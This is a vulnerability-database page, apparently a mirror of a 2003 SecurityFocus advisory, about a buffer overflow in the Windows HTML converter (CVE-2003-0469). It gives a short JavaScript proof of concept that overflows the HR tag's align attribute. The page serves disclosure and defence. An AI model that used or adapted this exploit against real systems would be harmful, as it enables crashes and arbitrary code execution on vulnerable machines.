Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2003-0469

Publish Date: 23 Jun 2003

                							

                source: http://www.securityfocus.com/bid/8016/info

Microsoft Windows platforms are prone to a boundary condition error in the HTML converter. If the 'Align' attribute of the 'HR' tag is given an excessively large value, an internal buffer will be overrun. This issue can be exploited via applications which use the HTML converter (such as Internet Explorer) and will permit arbitrary code to be executed on a vulnerable system.

&lt;script&gt;
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i&lt;=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("&lt;HR align='"+buffer+"'&gt;");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
&lt;/script&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Microsoft Windows XP/2000/NT 4.0 - HTML Converter HR Align Buffer Overflow

Vulmon Search

About

Products

Connect